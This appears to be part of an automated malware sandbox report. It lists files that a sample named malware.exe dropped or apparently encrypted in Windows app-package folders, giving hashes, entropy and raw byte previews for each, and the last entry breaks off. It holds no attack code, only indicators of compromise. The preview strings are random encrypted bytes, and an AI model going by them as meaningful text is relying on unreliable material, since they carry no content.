                        Preview:...+.j%.#1.<.8m."p..JX%D.D.~.F........i....4z. .r&Q..-..<_...G...|._M....J....h..:I[..Q.......\.c....!........s5.g....7....h'Z.K.EI.Ls;.r.../`<|J.......L.$N.w.W.'Gd...rb,..k.N..}F."'..O...F.P.Q(B...w.7!C;j..qF^e#........5AKA...D........G....E.H5.J8@.ee.p..0B....jc.R..:...`.'\...?K.......8.C........[2u'.H.v..v.....'.X..l.WF.D..{l...$~......'.,.V.lJ..%..7..N..T.aS..R9..Q6N....E..U...;.ny.)8v(.D.v.8.y.`..:..W....Z.w.3&..]...B......!k..Y.8ss..a..J...%6c..../...#N2.s..y..."..T..MC.)I..r..oU...,.b...,S...4....,.=.dN.87@..@...f..@9C.{.......z .#.5.@.l..E....e!S=......{..=.DI.3.........>.......}..{r...Y..:@_.e...N..'%.:....H.0O:....x..#.,.Z..P9.W.6....J).....O..}.~....Y.H:.+.{/...9..1*r.n.I.x.? .TY.....B'.&.........$......Zv.............tt...../G.8X..{..5AuD.JC....:.yJ...f.',...`....QX+........o...b..e...F...vjC3.ETd..m...`...Yt6Rg`2.-.2.ML0.L.U....e..."..q....L-...Z..d......I.6..n.r*E.9]GX....$,T.r,r.O.Tq........d(.=.....Tsr...M.1...$...)...|.^!..pH.L*\0C...j

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408906620712704.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):118301
                        Entropy (8bit):7.991525687168976
                        Encrypted:true
                        SSDEEP:3072:7h2ejbDhD8F+UkPrqe6Aay0hsVe8AAQ9I+rV+7HR5OjeorZz:lzpA+UkPrsgRQi+R+7HR5ceoFz
                        MD5:120C36744D93B059DD1833BD91A6FB00
                        SHA1:EBE936892DE302DC0A510FB9DAF2189EF9CB3115
                        SHA-256:289141DED4F0A184FC7FE28353E18919D51E7DB73CA52A46D7E7372CB7A3D562
                        SHA-512:690AF42F75EC9DB747A38DD08C52833C6AFD347956A05B763536CFD97C6F0DB0CA7017BD3AA9C0FDC6ED9A706EED20D7CAF6B4068B962B26B74EE4D5FEBEC4F0
                        Malicious:true
                        Preview:..p....>.6....:/.kL.C.-,(p+.1....k.X.[..;..h..l...&.H.B... Rs.sV....}.;....HI....U[.k.sC..D..V=...9.+?....i..%...h.X.KZy..h.....s.R..d.<.c.i..Vo.V(.\u.....(.{ ..G.A.O....S..[......,Q....A.J5O...b...;.......D.Y.....jc[.....HD..R.D6........5...H.z#....oH4m0..\.b....%...-...OG.aTu.fh.r....y..S]...... .*.-.....w.P.g..M...ef..A.L|9..........OL.O.|.~[.X6..QC.o.T...ty-.;.K`%..2..`s2...2.!....cF.....X....8.."`...z....c.....Y..[..`.p.zJ.....Z..1.o.~3d..e.U..Y.\..!.X.gz...+j]...^.....[.....;...BErG......9o..\......3n....~.....HS.....Q.....?:..C...5..............$'`..@.<`.....?o...a!.c...O.V.D..G.'....m.~s.V.......oe.m+|.=...I...,.....CM&....%h..E....p.t........n!.H........g.C1........|n..-....:...w.H.N.XO....R...:.."..y...........*...$....Z.j..wGzj;2..y;........y.3....|n....n.$....C.)4 ..T.V.t.).....p.."<...f.U..FoT..}r...&.uA).y..y....k`.:.y=.....^.J.....B..CK BI...'.p...".p...m.........A..[.[N......].8].........L.../..(....a...;... $jl...w}.T}..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408907975188232.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):117020
                        Entropy (8bit):7.994369304259974
                        Encrypted:true
                        SSDEEP:3072:mIskVoM0VPsHWsPt+w6ShjTLT0FIxirAKp9JwGPH09O:RVolCWsPtd6gUaxVuJxPHT
                        MD5:CF6F6742739C4DF685D1F982AF4FBA63
                        SHA1:BA64D61081869AFBD6DDB898AB6EE9CC44A501AF
                        SHA-256:32ACCEE5DD0E352415DCD6D910DD08C14B96E571243EA34E57DCBA05B2C7EC91
                        SHA-512:7A32FDE0E0700E426DAC25166B435CB861815E9BFEC43BDE44A308C55BE519539FE5788F3CE4B55B8F447B8B9D5BCB8449049DFDCDF8CBF74D58C188710DF4CE
                        Malicious:true
                        Preview:.K..d.[.U.l.5.K.I6....;.......5.ptf..+.......r...g.d.<.3.*.....RD|.. ......3...!.Fi.%..Q..c.......I.Spl-,..9.F@.$.o......j.y...n/.~..S'u..^.Gs.3..:..2K.}7DP......Z..8.6=.....H.g.B0........X;'UY..<...8q.."3...y..a..[/.GcF...{.R2r.f.........F3.}...q..1..JL......L.K6.=.rA......C_..a......T.V..k(p..,h..Q.;.~.}.~.....J...S6.!..=.Q...R..y.y.O...]..w..dr&np/.....nU.k....7[q.^..<.....8.VO]~..9.U.Py[....8.....9Z.eF......|..!.C..!r..7....!.2..1S.5..l&3.[..mF...{.6...4..H.l..m-.L.......oO.a..cxg./.......Q.?..H.6fU..^.|:B.QQ~..>.i4.X+...R#7..&q.O..*e.[....j...89..H.".^H..0...}..B...!.....E.86....*..<......g.....Sv...T....8E...3 .^`}(.s...e'..<..j...1..p.K/....[........m..~.^.1.....1R.5.D.c.......e....(...gm..Qi...Bq......2..4.......E....<.[....d....?J.A\..N.MK....T.i.,...oB...hh..m.r....b.;E$../..q-...:u..I..b...e...N..ts.<.............7G:..9....v..Ps.=y.{.....4['S%.9.....4..."6.2..D......k..M.2.Tf|.....K.._..i....%...8K.Vr.D...\G&+ZV...T..oI.{~.

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408908224609935.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:SysEx File -
                        Category:dropped
                        Size (bytes):116591
                        Entropy (8bit):7.995162163107687
                        Encrypted:true
                        SSDEEP:3072:zmzg1iALU9pP06EKP9QVk+Cn6FYCDU5vB7EzxdDXZA:zagMQcyKua+C6FTU9BoL2
                        MD5:65F4F3F9418E62A0A9DC5E975E160659
                        SHA1:7A25BE5A73984DEC5D06E76E84E3F89D6F5C69FF
                        SHA-256:7173814993C1E098B65EDACE11BF95C6E78B9ADF6EDB630EA306823B227F6E02
                        SHA-512:E4B0A39F2D8121D6D5DA13521B92B08513DB3478987BBEEA7675FB8185C146EF41B16171B144D9A582195A8B04D6A56994469F88FCA633B2E8579431F3A17E39
                        Malicious:true
                        Preview:.V.c..B...L&.mh7[.@...=i.J.oz..N.....M.V_2.9......'.i.(8...vw......2A.M.b....8.]Y......=.T.K...(..~.lf.K.....'$..v.'|.c..d.....r^,\b.kI..)"d..[.K...0....D.+.b&>?....*x`..B+.r.K.....Z^.H.^.kc.AXx....JI..C9.....]T....j..=.....-........@]...`.%...1..V.[.....3..r.G..O.18.9$..$&.{..d.B..a.g....}Z(...@..eC.M..?~T.......Al..6....B....0#....d.D............A..4..]..{...RVQ6b1.........Nt.......g.....H...r..45..`.C........M...`...c\...5..Ed.%........Z..H....o/y...n....E.+...au^..F)..._...I....F;..o.}...h{,?.&q.....N..`.0.v...Z&6!.m.4Z.~.3..N.H.db|.{4'T.c.W,}.....|....mt*P..|..`nX}j..H.~]u...Qo<_.`..e.sU.,<`..]..o..n.2..c.Q.Zv....:.A...z.....$..<."\.._d.F.fjc......i[.e.....!~.....U.......).,.!......QV.x..'"..y#......}(.W......b1.....]....W~.D1|i.o./...U.g.\S.ET.n..w.......F......bV...0_;.....9.f....#.1.;.......uZ.a..j......ATR.~....qCX....2...=.j.M...*...... .#=..qaT...~.S3...K.G.>.Om...!.(B.G...@....|..yG......&h.h~9....{..ep.}.%.BJ...0..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133408945536046333.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):115049
                        Entropy (8bit):7.996110759414279
                        Encrypted:true
                        SSDEEP:1536:8rp6MOoFT99dKSFAzazQYJaoXIgNEBPm8SeJYZs2ns8nByRvpTi44EjBdWXyVCk/:8rV9KXezQYJaaIgNKNAT8Rvpt4EV0X/+
                        MD5:89A9C576C570311C9FA1A7108D32CE73
                        SHA1:A0A411B965D155CD61899553E9E2BB2479201F32
                        SHA-256:0BBAFDE19C88AEBD582EC72468EB31E44687A24BE3A842F1D98444FFD30A5FD5
                        SHA-512:17F25A9B7C71E3CCA862EBF14BDA28A259F2E86BE750CE133E50F83242002F5DEE965B820BAF3A25BA56A4DA0C4852296249BC6D9AADDA81C5A3791C49006D73
                        Malicious:true
                        Preview:.L#...{?W...a....<.5..A..Z.uD.-.X.}c."q..k.1.[...2..X....f...O....yU.@...H...JE."]..UN..F.....S..i....B....oTbWC.......G....(.'U}.~...jN._Y.*..9v.P..g..Q.~..x.S+.-..6'.s......C6.>..e....m..?@.;...T.nR..{.+.P..J2.E..sm....X.+m6pO...mh..y.....^....)..~.N7.l".....H..YG..1c...".u......X.Q....,X..9d.(hv\..z.M.3E<.8....Z..Iv..{.;Y-Z.tQ........cJ......6q.<...V.3.1T.3`.P..}.....*.q...0.c.?...U...U*]...0.P..~sg.iC.{|.}.?.Wd..IL...._..~.....^R\{......".D..........hp..=.~8TWx.y(W..J#I..b....h.7.'8....q.....Z...|....=Ou..K!.(l...G.H.X..I.........#I...(5..Ou..H.g(...[...;.Zh....B..0>.O7G(_..".....%..O...I.%...>.F../.t...g?$yG..0...i.xD*.GB'.ib.{....d..G#Sz.C......:...........b..j......|......S...K%k.E..|t.rA.B....I.....I...|.uq...h'...b.8q..X..En.P.`....k.".$.T....K..j.E..=............;........A....A.Z.9...wN...t.,R.).R.8y....:kyS.u......I^.x.8...D._t...^91.e5<.S..2./......"k3X.\.1O.c....e.......c..v..@H}P.Y;..mS..$w...4).S..<...j..`~PX...A.E

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133780452700603090.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115049
                        Entropy (8bit):7.996872208590839
                        Encrypted:true
                        SSDEEP:3072:S+OGb3VFDDUUEIfx0/88Bn14mef8OnIl5mzL:1rDegx0E8Bn14DfU5mX
                        MD5:D0A9BAEF9C61BFE30C2F8CC44AD7E1E6
                        SHA1:0BD04E334FCEBE3AB65DB9A211B52DA44D577CFD
                        SHA-256:464E805A7EDFDCE7C287358BE5C13B80EED4178EAF337414DD4E8553570141F9
                        SHA-512:ECFBC0EDD780B16928604C9BEC94AA57CB1A8D799CF06BBB09BAC9894FB10427025275295FE6A78EEF7D4DCBD8FA10BFF145DB0992B52F7A597351F61AFFFB8D
                        Malicious:true
                        Preview:."wATu.nQ.R...y....J.`.j...../2.}"H....... k.:......a.aR...rr...&$.P..PTj...|.b.R....`..M....ve.....h...}...CI..O.......ui`.|.\....f..>...;...J..\o2..Ui.+ F^..cX..T.Y.u.S.V.,.N....-........\..C.L...w..urtrm.Y........u.3.<<.....K.U./b..{..PX...(K.?..I.....z.d.z$..{<`Q%...V.;"...Q..i.|]BzMR;G'.i.a/x.U8x.>>.u...M.E......oj..1...$.G.A.aX...Le..2c].A..F.)S...cy.9n....E........|.....k.,...XH)V8...Om..sQf.i............`a9..........a.0)...N..{..?..G^b .....[..*I)..=....(..j?..r..R~...$..V.].6y..[........I.(J...oz.I_...VO.R[....A:..%z.......R2..3.'..R....M.s...}.,.E.2...A+....c.&'......1.{........V>.+.?....^..Z...>`.4Yp.NnYA.....,.4a.Js...>I.~..Q..*...._I.....{..-...<..z...$.W.....tB....2a..c.....t....B.My\.OQ363/...... .P.T..g.5../7.m.....(4{...Pm.#....".6.j....V..M......vQ.H|..W@....m...g.K@...[6w...?....x....X..#E..><.n.O?Q.kh\.&....Z...@.p..d...0.....cy..5..57R@.m.J.Z.......m..e.W.y..#...nq}...M.^...AM..xR....B....(...*.oY....L....(.D....{..#..B

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133780452996319870.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):115067
                        Entropy (8bit):7.996794532567531
                        Encrypted:true
                        SSDEEP:3072:7AHTRDHq2e0yNvDr/odwJDFMMUEXhVb2ZRxWbg:KeAyNvf/oEFhzhVqR4bg
                        MD5:C1569C8E0E98F523327B0D2D948CEE04
                        SHA1:BE4B063395C9AB93DA06CC0C4A372D89CC5B11A8
                        SHA-256:283A76641267570F43EF0649E443FE1FE6CF39CF90B2861C0896DED6608E24C3
                        SHA-512:F14821C0DDEB8B3468D42B95FCFAC4B22F51A00EFC3126E4DA88FF2A2CEB74CD6126507DA4ED5E6DF64077C03F5B7CA0A3EF61E3447CE2478A14849EB69A1914
                        Malicious:true
                        Preview:........DX..z~`..K.....5..L....t..$m2E....z2..B$...z.;7@#...uyC...2N.,Y.B4n.VA&.).0gwc.........%g.d.D.....6.z.s.s..m.!.n#...^.M[..8..,}*.....Q#mih.~.zu.P/.....E.....\>y.:\.................B........P.J...M..S...1.....ww.f.....s.;.R=.2=jb.....aU5Dg...Kv.H.8-.......2d...c."...a..nI.'.18=..Z.....az......?...2&...S.....N.Fm...\r..j.u..)C(U....f,\..u.'.s*.C:.g)3i. ...../....t1.%...WF.......m....Lr]...w....h-.'.YQ|..M.@s..).vrf`.R...wsr......G.{,.i...l(...n.@.f......M.l:-|..Gt...N..:>..&T[.......|rU..}0..F...g.....VD....G&..z;...Jq..KQ(.c.}.{...b.....9aY.K.P.n?..p"..Vy........*N....pxa.id$wvAG..Ic....].k.Wy.c..y.q.....E..9> ..6\....r.|C..C..oa...,.y4.Laz}...sJ.W....'[|...n.N..a...v.....i.$.(.N.$"U.pR..].3B.FVf..x.....&sn@..H"7(...H...<p...... ..+.C....`...]....f_.-..P.B..(D]...w..w.1............T.-.V......+]..^l.r.=...]..#kY3.@.............y.oM.x...5"k.e.,..l.E.7.f-}#....:.Sj........w5.375..v'...j...... K..........._U#..|...@.1.D...J..X..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):696704
                        Entropy (8bit):7.998051738208456
                        Encrypted:true
                        SSDEEP:12288:ypGikqhWgAQN9tZz8mKqAc6kFz/fsfur0eOtmZkBcUL61WJK0Mg4xXYrua1/Z7J:ypbbWgAQYqAcFfSQZLba1x9
                        MD5:432BE38525ECAE6D26516594B4DF08F0
                        SHA1:2FCC41C06A861262C090149E6D2B1188B01F9FCC
                        SHA-256:5208C62788E5D4A4E6659F9A1C0DFECE01E4DBFD4E8492BFC3D34BE169FCA1A2
                        SHA-512:3D7AFAB14F6EF7853D30F78863B1F845E59A4CA7F71AF5373CD6278ACFB30E8A3BF222EBAE15C4729C84290AC696D01A8C8AC99216A3E4AEDC41431C21F32830
                        Malicious:true
                        Preview:a.}:.2...f..K..r.6V.A...V.C..z./....k?...||?..dA..J...\...O.F...P\.u.Q$......C>..}'...hV..u...Q..x... U.w..`.w........5...%..1_...sP.C3.l.\].....A..@,...c.....r.......L.......|...N.]....@-Vj........,L..`..u.gLs.?I....sR0...........w.DC.}."...(..Zq.J.%....M..Dr..).[.}|.=.q.R.....*S.}4A...`.|......{<.k.|.a.a.w..!....o:9.EP..-.=0.9.B?..c...A..~.o..^.8...X.#*5v...f....Hk:.(.3...1N............7....@E...Q.T...&.)7.".JAl...w1D.92R..f.<|H..mw2."Q[.T..O.R.....,...<dI.!....yV\..O.wM.......c.C'.Y7'.C@...,.*.`.K>..1=.7&........3...n..ef........;.f.v...V..b...L..r'.....a.>iae;.Q....,`x.8..x..Br.*km.7E.....h..X.i.d0.c,89..>.o.Dp..QV.w.6e..U...zZ;..d.'.Z.E:IJ........G...'..)Kh\.8.h.?.l....XE.P..$.....8R....t....+....RP.F.-60.......H.2Ig...8.V...n.+.M.....m..j..|.q..S..KP...!|..+gDH.21i{.P....v.$.P.!..Z.p.............-..c.p{K3.1.....q...d..oj .o...a|.2.?1...<..]..X..e~.)...W....c....E....".b]..8......n.d'.....j.7.......dG$.Yu.#.k.e9...i..Nb.'....0I{.X

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):148798
                        Entropy (8bit):7.997328804838757
                        Encrypted:true
                        SSDEEP:3072:TJy3pw3hjbijsI6f0iSH85tiF23OEyU8A273b+DldE2DBbJLerOc:1Mp2fQsI6ciM+pfyUKLbqy0Aic
                        MD5:558D1F47B957BF28D2B6366F0CCA0095
                        SHA1:7883A18AEE30829711C3308C2453FFB388EA420D
                        SHA-256:103FCF170ADFB60042B83B0D5F3582E8F0DB08F0B6A0972C6EACD0D72793FCC2
                        SHA-512:716265E874D0EFA3E986204B0289B3A2B37C4EDB0BA01BBC25BAFA5BC36DBA3B251EC9A17D25EA37644DBD64EFDAB3A737E030AC56FEE9E1BB4303B9BADBDE1C
                        Malicious:true
                        Preview:.w....GPZ7<B..v..z...e_#.FC...a.b]<..w....aoq.U..(Hw.$.:.)......".EH.n..2o.M..g../...M...=.....Y2].d9."b.$...~*..g......F..l..C.`...LH.).z...o@]-?i..$........F..e...@.".../.9...7. ..].....o..A.s.#h.g..a; .%.qZVep..[.......+'Es"......I.........J.[.L..@..9.Fc.....*...x.x.~..qa..Q..v...|.>y9.9:.q....k...t x.q....x..u....L&.+%k..'l..~.C..lU.[..;....A..L.|.X..v.4.^V..P.S.C.p.. .;.....3`..^]J.y......l2.Pk..*...p........BX...b..N.^.EA|..;.MD........R.....o.<W08........R.J...V .......K.t.1$C.....nF.&.....>$&.q.Y}..i.......M..n.=1..0....^..T...?......I.....2.^.7......l].r.n..W.....E....-...v..\...r`A....m...u...$.W.Y..g..]...1<.C.N.5....VT.3]........).6...F.........m%.u3.....n.`Z.@.7.......X.'.C....g.*...'N -.O`N..i.....d.....;...6.."%...N...O....N}.B..L......>..y...4.d...~...E.....J........o.... .0.....g....=I fo>....E.0L..S.....&n.........Q`..>.S......(...bf...U.Id.._..J.%.4....y^......+#.....".Q...P..0...0...x...Lh.....4......E.$..ol..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):38560
                        Entropy (8bit):7.995184840521819
                        Encrypted:true
                        SSDEEP:768:tW5/H/Gd67tIrXyCPTmYvDbQFnL27c0QPD/x+nMWI9GidZfF2:tWwdx5PTm8EK7c0ID/x+MW1cfF2
                        MD5:B36073DB821496936FF87BF917CA9951
                        SHA1:97FB9DA48434E1633D7EC0614A95075F57B7A2BA
                        SHA-256:34BA10D4CAC209BDDBA31D2A4199B65E525B9000AB30E58CEC52CDD4B42D72D6
                        SHA-512:F390ACCC29BA606E998D8BD3F7E7B27B1033974770AEB2A38B53C785B8F01AD5FE6A91468A206CEF07A2FA9F9E2FE4985DD3F4FF17D8B543B0E21AA2DC71DFD1
                        Malicious:true
                        Preview:.My5.47>S................N....O.:....h........D@fs.y..#.a;...^...9.doi,........tkib{...6y7.(.=/.!......|o.7...w.%Z.u..r.G@....!.....5...H.{.....h.R.w...^.T.:M..d............XD_.nWg.%..k....N6... ....D;..v...1c..6.3!....t..5o...).......h..q..H.E.!..Fm+.c..F.1q...&.;h<..u.E..fY.W.&b...-...~.7........a<.E/.....2.f...H.R......f..x..r..w.....K.=........>.7m...kl./hv..1.......j}..Q....SA.EM{.{....+.<s[..".i..L...?...........".l..=...x)...-..|t~B.Q...B..\."..8.Z....q...x..U!..L..)....pWk}p..k...~W`.}........$.........b..%......oX.*.......d....`.B.p...G1.Z.-<.G.VP.d.*'5.... .g.s...2.<\`.#..^..C.U.e.r.i.(...)&x.i]c.:<.......>...j..T..pjQ.gCs.O.j..s=.]...\.NZ.,......Q..F.p.."...y.n...hCq......G..xg....b....630M.K.T..m. ...f.....q.~N.P.x?....@.#.@....._..Ie.....].rS...wA..sf..e....*..bx..M-Fz...\&...DN.E.-Bx.$....p......k.....[....S....n....X.)...........&3...F..E..!\.~...@.O.;..U....A>=...`.Xk..M/....Y....d.....B....fgr.Fm..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.988083965804022
                        Encrypted:false
                        SSDEEP:384:yQrbEI/uF+QN9C7gLKWieX0xe1b9souE6N9+DZNKWSp:yQrpDQqeApv2DZNKpp
                        MD5:5019691B5179B59D8BD3B65221E64BAC
                        SHA1:315D86ECE74D60C4B96423516800E20187A5E986
                        SHA-256:C1BDBCF157094356593BCB297CED8D1D1314414C901C56C34F801AD6A3A4E98A
                        SHA-512:D5FB774C047D265480C53A34EB04CDDCC2DBA6EF7843DC0F7D53DA2D5EF03D7BA1E88C5E6C5FB4BD5FFBEE4B123516CA2C61FCE5A96DCCB2F8F77D74E0FA1DB7
                        Malicious:true
                        Preview:.a....G..d...;.0F..Zl._...v.%..#.. &...n.O.a..1..V.E9..o.u.W&..3.@P. ;.I..}T.5S...T..89.X......y..*..R.z......#.I....(=:...x..m.[ I....LM...m.".,.1...6C.mrr=.H..?+i&.E...mokSY...rL..FM...p...N..d.j.....I7D.<._..f...T.HZ!.d.....A..H...%v.7....V.t.i+.A...'~o. ._...p..G.....G(..=.......".....G.i>Hf.i19...w...D....<m....p.\`B....H.4j2.n.-........$.J..?[..*"Oi.B.(...~N.d.Q%.!...Z..B".....R.W./z.4.*.X'U.j.._`....S2.m.Pk.oUl.\...T.5.%X..27M?r'..Xa!..1OBM...6o.p.}.@/.........{U..Fps....7.o..vZ..^......'.".....o.J..7.iQ%.*...=]L.)p.os.._..WO*./...^..uo9..k}..E.'.9;..w....at..7.:H...'..S..3...l[.)..`......SV.&.y.....m.2............pdJ.|........A....:.n...}..H...oS.q...#9K.M..G....pz..$....;2...u.......r?.8..@T2......X...y..?F.....c.~..+.. ..JCa.?0.{...g...g4..X...R.\.<.N...t..j{l.^.bkm_}h..O..y{.._....."A.j...9at..$...LuoR...a.0"^....*FE.$t..g|....f9;AT>.J..m.D.t.D;...9.:.._P.'..e .0B+.....{$..n..,.............kyy.f.....Z.P.a....P....x8..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):32876
                        Entropy (8bit):7.99446144552554
                        Encrypted:true
                        SSDEEP:768:GBq84fIl7d13SgMDAHu9bibfS9vDkvIE1atc:DsPnWF9Uwbkvn4C
                        MD5:10A36C46AFD67E12C24EB2D10BF60E4C
                        SHA1:32E763CBD126F16246DAE873F085F0DAED94C79E
                        SHA-256:CC4EEA64A90C7A27F89FCC864BA765D0A75E30A70FD465540560B119BE8056F7
                        SHA-512:C430E13EBE1C2A448FB10D5F532B0D0D922E738BDD8729480030B8625D88451D0EBB3DB09A39B2B8B56DAA7F140AEEA41BF44440436CF839A079A06621F6291E
                        Malicious:true
                        Preview:.+..5..]....@.X..\..p.Rv..-.......R.S.3.z#8b:.......pe.2.u5Wo.d..F`T...RQ...Y.D..LO_]i..%v.w......?....V@..N.....;>[...gpn..........E.^.P.z........$e7..5tp1...a4.&S.........-.@.n4...r....I..G..2..........P-.d.S.3ZL12.K..*u...T.Q..z...|..k(...../E......'.vm$^#..K..Q...A.$..xH(.w.r.....Km..(h.Q\.....}...^.H_d..?|b(p/.$.=<Kx.R|}...b.Sh}.F..e.t.%T......O.....%.H..K .V.us...Dwlz:.....].............a....N".Q~.w.....|*a..D.@..;6.^...L+w\.q..`.P..6..-_C..S.z?)..b..#5...#.w.E...b.....U...........p..n....`W.....7.x....fL.@.0]h..[oyh.W...a-...S.N#..<.a..........=...9.f..AF..{M0.........d.u.vAj...o..*^.VN3c.XD...0.j.3..S.....3...h..D..k..~......B....F.*`..kN.~....C.=).....4?.q...5.....n..M.S..hV.^K......IX..(.6lo./r.9.....b.z.Q.}.f..V...)..)./?.s}z.:..G.W...?...7R{..m..F..O*.?..>_...r.."].f.].=n...5..........D4..Hp.....a.y..W.S.*<6.sE-......u.Y.Qy.S.).E>.k.....^..n...j.`.JW.$U.>.E..W....).t8...+j.n....8G?.;y...-../..;....5L...P.%.L=.$..........<#k..5..

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16492
                        Entropy (8bit):7.989393955476778
                        Encrypted:false
                        SSDEEP:384:OqQUDb6wVEWSr4+WOIKYekWzBQ/bwSCSheXBO8wdREI:tb6DWGFAezebwLKeXxwdREI
                        MD5:F2A61CB9EFC71CFAC5FEBB7082EE16A0
                        SHA1:C5FE10186C9B020155755F40978619E50719E931
                        SHA-256:633D707C405C44A9EB5480E95611F6FAD7EA6857890ABBA76D5B935D9A18B2B2
                        SHA-512:FB4F2022529883E5ECEB1C09E617BE55299E1578F35BC6897B781CA64E0DE8DADA22C5FCBB89FDC85AD1BAF0130444ADF0548CE1F2795008DC1FF310F1D7051E
                        Malicious:false
                        Preview:.....%...2..]x .....FY.V..&iP.........!*..y...t".#tgK@k.nVG.x...r....#.m...?o..-..(.W..../...\..oP."~...D.Q<...].s.@.L....6VB.ug'.x...*{..Q. ..Ym1|}..J.j.........."&K.Gn.'.C~...`o...tJn.Hcy.I<p..(G.....8...5..I...9...$o+@e...e.\.P.. iV......!X.d.....D~..F.g7...=..R..<........%...X...K.....v..N..^/..u.6C.r-d..K^....._.M...n....?.!.i...S..,..|...1.Y........U`y......W.|...[.V'..;a\....=.Z.5.."..i"..-..O5.8f&..~N#D./.....L.J.97..LI..i.y.ID.@.......9..~6`u.8.q.<.+...VY..'4..F....PZ.4.T...9G.....\...w.t.K.k..F..DD..t.......81.65l.`.]j|)...(:..f..U+Gj7.>.<z.8,..*.i...8......q*.QN..s.<......4.^.....e..7>\"\w}....m'..5.x..-..8`.]...p.2(..eL.A&bB.Qp..VJ.G*....KwTPPw..z...W.S>0{........g.F.{H...H...PA...........Q....B.k.7...M.X0I.!...........=.:~..D..F....{...y|.........`..r....r..:."..;\.-.........C1...7w....=.....|i.......X+.aq...l.k..^...w......O.$..e...7..T.xB.....7/.f.TuM.?.s..!...b..J#e..y.h)$cM.B..s..Q<.|....u..'<..d.c.D..K...+.B._FB..I..HGE..L.5G

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):44520
                        Entropy (8bit):7.995698167424526
                        Encrypted:true
                        SSDEEP:768:at3HG+pVc3E1La7LsNOyWkXzRdDalXDCSTPjPVNU5WhavkH/RTvDI:8HG+/c3E1YLs4yWINJWXuyDViohacH/S
                        MD5:C3DE6BEE3C63374BAA663D6D4E81D057
                        SHA1:B2DBC11324CA0F80B0A385ECAA0792A3EB305D46
                        SHA-256:F875DDEBE7599C8FB52DE3860B0E4C75FAD733FDA623F2480C3D811EB18573E2
                        SHA-512:1A33EA19A6402CE5BB025CCE241CC4A0B97053F42F2D6290840EBEEAC49FA8E7C88FA9BD8E51CBF62DBA3BB50E346AEF1CF7A80DE191CFD09615297D18A6D6F2
                        Malicious:true
                        Preview:....@...rJ..]....O...|..Z.l.}.d........._.u.H.I..O.*.5`.@...K....S....X)"!.nhO...Z..x.F......h...eR.7.Am.#...Nc.l..m... .......**s^.o..../..l.[.!21..c...i.."....X......?].. u..t'.y!.j..).........r..K.........4...B.6...TF.U...8..#{..j..I..`.b...1.....}..%9...L..:.hc....n.......?^k......1U.(5i.<.E.j..Dj...6~.G..I.[....m.....N:).h.!.@e..)..v*^.#rL..I..tz.(2........m=....0.+th..O..r.Y^{..Gi.J.ZI.e!..w..^.....B.....I..).-.....y..Y..Vx.W:...)/P..O.2.,.P.r..Z.g2{....A.mD.8P.=.........H;reh?Z~..m.....}.F.o.4.].x.>.w..d......h(*t........G...'\._..u.....<..5.o.*.......+.X.z...(Fd...i....X...Eq.A.e..,..'.$...t..&L....>[[..{.[)....k.....)..z.[?......V.p5d...t.g.@..~.U...h.....a..... ...5..r.eA...5....Y..4z..8t..`....$.|-..z.:.4......r.D........:..&..^..X.?7...s..mz....q..|]OxN...s/.!....=\a.-..M...#w6.!.......m.....H... [..>3.......\E..yi.@_FA....Z....n.1...;'..c....Jn:..Y..C..A.v.l}.....05...x....T.q.Qu6h...,T.Y:....RH....D|.4&.D....ot

                        C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\HxCommAlwaysOnLog.etl

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
